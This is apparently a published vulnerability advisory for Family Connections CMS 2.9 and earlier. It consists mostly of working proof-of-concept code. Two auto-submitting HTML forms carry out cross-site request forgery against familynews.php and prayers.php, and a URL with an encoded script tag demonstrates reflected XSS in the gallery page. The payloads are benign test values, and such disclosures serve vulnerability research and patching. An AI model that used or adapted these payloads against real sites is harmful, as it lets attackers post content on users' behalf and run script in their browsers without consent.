1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 |
Family CMS 2.9and earlier multiple Vulnerabilities =================================================================================== # Exploit Title: Family CMS 2.9and earlier multiple Vulnerabilities # Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # version: 2.9 # Category: webapps # Tested on: ubuntu 11.4 =================================================================================== Tips: *****First we must install all optional sections during installation process.***** 1- CSRF Vulnerabilities : POC 1: Page "familynews.php" <html> <head> <script type="text/javascript"> function autosubmit() { document.getElementById('ChangeSubmit').submit(); } </script> </head> <bodyonLoad="autosubmit()"> <form method="POST"action="http://[localhost]/FCMS_2.9/familynews.php"id="ChangeSubmit"> <input type="hidden"name="title"value="test" /> <input type="hidden"name="submitadd"value="Add" /> <input type="hidden"name="post"value="testcsrf" /> <input type="submit" value="submit"/> </form> </body> </html> -------------------------------------------------------------------------------------------------------- POC 2:Page "prayers.php" <html> <head> <script type="text/javascript"> function autosubmit() { document.getElementById('ChangeSubmit').submit(); } </script> </head> <bodyonLoad="autosubmit()"> <form method="POST"action="http://[localhost]/FCMS_2.9/prayers.php" id="ChangeSubmit"> <input type="hidden"name="for"value="test" /> <input type="hidden"name="submitadd"value="Add" /> <input type="hidden"name="desc"value="testtest" /> <input type="submit" value="submit"/> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------------- 2-Reflected XSS POC : http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E ----------------------------------------------------------------------------------------------------------------------------- |